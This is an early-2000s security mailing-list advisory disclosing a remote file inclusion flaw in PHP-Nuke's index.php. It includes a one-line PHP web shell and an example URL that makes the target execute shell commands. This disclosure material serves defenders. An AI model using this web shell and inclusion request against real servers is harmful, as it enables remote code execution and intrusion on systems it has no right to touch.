PHP-Nuke allows Command Execution & Much more

From: Handle Nopman (nopmanat_private)
Date: Wed Jan 16 2002 - 10:30:53 PST

    Hi All!

    I've found a serious security flaw in PHP-Nuke.
    It allows user to execute any PHP code.

    The flaw is in the index.php's include file feature.
    It allows including files like index.php?file=file
    It prevents users including ..'s in URL's, but
    it didn't prevent users from entering http://-urls
    Remember the PHP's remote get feature...

    How to exploit:
    Upload this file to some free web space provider or
    setup your own server:
    <?php
    system($cmd);
    ?>
    Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
    will execute ls -al command.
    I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)

    Vendor status:
    I contacted the author on 28.12.2001 and he hasn't
    replied.

    Sincrely
    "Nopman"